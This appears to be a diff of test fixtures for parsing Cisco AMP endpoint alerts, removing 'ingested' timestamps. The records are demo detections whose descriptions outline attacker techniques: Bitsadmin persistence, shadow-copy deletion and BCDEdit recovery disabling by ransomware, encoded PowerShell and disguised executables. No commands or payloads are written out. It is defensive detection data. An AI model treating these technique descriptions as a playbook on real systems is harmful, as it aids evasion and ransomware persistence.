it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "severity": 2, 
@@ -801,7 +792,6 @@ ], "code": "1107296274", "id": "1521138739868158500", - "ingested": "2022-02-02T05:52:16.386283546Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "severity": 2, 
@@ -888,7 +878,6 @@ ], "code": "1107296274", "id": "1521138739846959000", - "ingested": "2022-02-02T05:52:16.386284547Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "severity": 2, 
@@ -975,7 +964,6 @@ ], "code": "1107296274", "id": "1494576726048000300", - "ingested": "2022-02-02T05:52:16.386285757Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "severity": 2, 
@@ -1062,7 +1050,6 @@ ], "code": "1107296274", "id": "1494576727672000300", - "ingested": "2022-02-02T05:52:16.386286751Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "severity": 1, 
@@ -1150,7 +1137,6 @@ ], "code": "1107296274", "id": "1458617561791000300", - "ingested": "2022-02-02T05:52:16.386287743Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "severity": 2, 
@@ -1231,7 +1217,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386288789Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 
@@ -1304,7 +1289,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386289777Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 
@@ -1377,7 +1361,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386290907Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 
@@ -1450,7 +1433,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386291913Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 
@@ -1523,7 +1505,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386292922Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 
@@ -1600,7 +1581,6 @@ ], "code": "1090519054", "id": "6880587030380676000", - "ingested": "2022-02-02T05:52:16.386293948Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "severity": 2 
@@ -1700,7 +1680,6 @@ ], "code": "1107296274", "id": "460392585524661250", - "ingested": "2022-02-02T05:52:16.386294939Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "severity": 2, 
@@ -1780,7 +1759,6 @@ ], "code": "553648173", "id": "6508191586038317000", - "ingested": "2022-02-02T05:52:16.386295935Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 0 
@@ -1869,7 +1847,6 @@ ], "code": "1107296274", "id": "7007136035192884000", - "ingested": "2022-02-02T05:52:16.386296942Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "severity": 2, @@ -1949,7 +1926,6 @@ ], "code": "1107296278", "id": "1515350231459808800", - "ingested": "2022-02-02T05:52:16.386298067Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "severity": 3 
